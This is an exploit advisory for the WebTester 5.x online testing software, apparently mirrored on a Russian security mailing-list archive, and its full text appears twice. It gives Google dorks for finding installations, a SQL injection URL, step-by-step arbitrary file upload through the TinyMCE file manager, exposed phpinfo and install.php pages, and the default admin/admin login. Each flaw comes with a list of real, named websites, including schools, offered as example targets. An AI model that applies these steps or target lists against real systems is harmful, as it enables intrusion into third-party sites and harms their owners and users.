Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [CVE-2013-4295] Apache Shindig information disclosure vulnerability

  Cross-Site Scripting (XSS) in GuppY

  Symantec Workspace Streaming 7.5.0.493 SWS Streamlet Engine Invoker Servlets Remote Code Execution

  Wordpress Cart66 Plugin 1.5.1.14 Multiple Vulnerabilities

From:X-Cisadane <stefanus_dp_(at)_ymail.com>
Date:27 октября 2013 г.
Subject:WebTester 5.x Multiple Vulnerabilities


=================================================================================
=========
WebTester 5.x Multiple Vulnerabilities
=================================================================================
=========

:--------------------------------------------------------------------------------
------------------------------------------

--------------:
: # Exploit Title : WebTester 5.x Multiple Vulnerabilities  
: # Date : 15 October 2013
: # Author : X-Cisadane
: # CMS Developer : http://epplersoft.com/webtester.html
: # CMS Source Code : http://sourceforge.net/projects/webtesteronline/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber,

Winda Utari
:--------------------------------------------------------------------------------
------------------------------------------

--------------:

DORKS (How to find the target) :
================================
intext:Copyright © 2003 - 2010 Eppler Software
inurl:/go.php?testID=
intitle:WebTester Online Testing
Or use your own Google Dorks :)

Proof of Concept  
================  

[ 1 ] SQL Injection
POC : http://[Site]/[Path]/startTest.
php?FirstName=a&LastName=a&TestID=['SQLi]
Example :
http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&Test
ID=
'5
http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestI
D=
'5
http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a
&LastName=a&TestID=
'5
http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&
TestID=
'5
http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='
5
...etc...

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)  
Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager.
It can be found in tiny_mce/plugins/filemanager.

Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Example the target is http://onlinetests.germaniak.eu/
Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_fi
le.php

Pic #1 : http://i40.tinypic.com/117z390.png
Then tick : Insert filetype icon, Insert file size & Insert file modification date.
Click upload and wait until the file sent to the server.
Pic #2 : http://i39.tinypic.com/2wluaon.png
Pic #3 : http://i40.tinypic.com/2uh0fir.png
If the file was successfully uploaded, check in the /test-images/ directory.
For Example :
http://onlinetests.germaniak.eu/test-images/
http://www.rzecznik.org/test/test-images/
http://simula.se/fun/webtester5/test-images/
http://811lifestylecoach.com/test-images/
http://umpire-test.splashprojects.co.uk/test-images/
http://zamoweb.altervista.org/test-images/
...etc...

[ 3 ] PHPInfo() Disclosure
POC : http://[Site]/[Path]/phpinfo.php
Example :
http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php
http://test.auzefiu.com/phpinfo.php
http://test.deltaschools.com/phpinfo.php
http://www.noordskool.com/toetse/phpinfo.php
http://bocahomehealth.com/exam/phpinfo.php
...etc...

[ 4 ] Leftover install.php File
POC : http://[Site]/[Path]/install.php
Example :
http://www.ibeucamposmacae.com.br/webtester5/install.php
http://briefhealthprograms.com/webtester5/install.php
http://intgvna.gardnervna.org/test/install.php
http://delarcollege.com/POSTUTME/install.php
http://www.orionhs.org/webtester/install.php
...etc...

Bonus : Default Username and Password
Username : admin
Password : admin
Admin Control Panel : http://[Site]/[Path]/admin/

Sent from my BlackBerry® smartphone from Sinyal Bagus XL, Nyambung Teruuusss...!


Proof of Concept.txt

=================================================================================
=========
WebTester 5.x Multiple Vulnerabilities
=================================================================================
=========

:--------------------------------------------------------------------------------
--------------------------------------------------------:
: # Exploit Title : WebTester 5.x Multiple Vulnerabilities  
: # Date : 15 October 2013
: # Author : X-Cisadane
: # CMS Developer : http://epplersoft.com/webtester.html
: # CMS Source Code : http://sourceforge.net/projects/webtesteronline/
: # Version : ALL
: # Category : Web Applications
: # Vulnerability : SQL Injection, Arbitrary File Upload, PHPInfo() Disclosure, Leftover install.php File
: # Tested On : Google Chrome Version 26.0.1410.64 m (Windows XP SP 3 32-Bit English)
: # Greetz to : X-Code, Borneo Crew, Depok Cyber, Explore Crew, CodeNesia, Bogor-H, Jakarta Anonymous Club, Jabar Cyber, Winda Utari
:--------------------------------------------------------------------------------
--------------------------------------------------------:

DORKS (How to find the target) :
================================
intext:Copyright © 2003 - 2010 Eppler Software
inurl:/go.php?testID=
intitle:WebTester Online Testing
Or use your own Google Dorks  

Proof of Concept  
================  

[ 1 ] SQL Injection
POC : http://[Site]/[Path]/startTest.
php?FirstName=a&LastName=a&TestID=['SQLi]
Example :
http://simuladodireitocespe.com/startTest.php?FirstName=a&LastName=a&Test
ID=
'5
http://www.huertos.eu/encuesta/startTest.php?FirstName=a&LastName=a&TestI
D=
'5
http://autoskola-buratrans.com/templates/default/ispiti/startTest.php?FirstName=a
&LastName=a&TestID=
'5
http://conalepnl091.sytes.net/simulador/startTest.php?FirstName=a&LastName=a&
TestID=
'5
http://learnin.elschool.pl/startTest.php?FirstName=a&LastName=a&TestID='
5
...etc...

[ 2 ] Arbitrary File Upload through TinyMCE (plugins/filemanager)  
Webster 5.x has a built-in WYSIWYG Editor, that is TinyMCE. The attacker can upload file through the TinyMCE File Manager.
It can be found in tiny_mce/plugins/filemanager.

Poc : http://[Site]/[Path]/tiny_mce/plugins/filemanager/InsertFile/insert_file.php
Example the target is http://onlinetests.germaniak.eu/
Change the url to http://onlinetests.germaniak.eu/tiny_mce/plugins/filemanager/InsertFile/insert_fi
le.php

Pic #1 : http://i40.tinypic.com/117z390.png
Then tick : Insert filetype icon, Insert file size & Insert file modification date.
Click upload and wait until the file sent to the server.
Pic #2 : http://i39.tinypic.com/2wluaon.png
Pic #3 : http://i40.tinypic.com/2uh0fir.png
If the file was successfully uploaded, check in the /test-images/ directory.
For Example :
http://onlinetests.germaniak.eu/test-images/
http://www.rzecznik.org/test/test-images/
http://simula.se/fun/webtester5/test-images/
http://811lifestylecoach.com/test-images/
http://umpire-test.splashprojects.co.uk/test-images/
http://zamoweb.altervista.org/test-images/
...etc...

[ 3 ] PHPInfo() Disclosure
POC : http://[Site]/[Path]/phpinfo.php
Example :
http://mhsquiz.marbleheadschools.org/webtester/phpinfo.php
http://test.auzefiu.com/phpinfo.php
http://test.deltaschools.com/phpinfo.php
http://www.noordskool.com/toetse/phpinfo.php
http://bocahomehealth.com/exam/phpinfo.php
...etc...

[ 4 ] Leftover install.php File
POC : http://[Site]/[Path]/install.php
Example :
http://www.ibeucamposmacae.com.br/webtester5/install.php
http://briefhealthprograms.com/webtester5/install.php
http://intgvna.gardnervna.org/test/install.php
http://delarcollege.com/POSTUTME/install.php
http://www.orionhs.org/webtester/install.php
...etc...

Bonus : Default Username and Password
Username : admin
Password : admin
Admin Control Panel : http://[Site]/[Path]/admin/

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород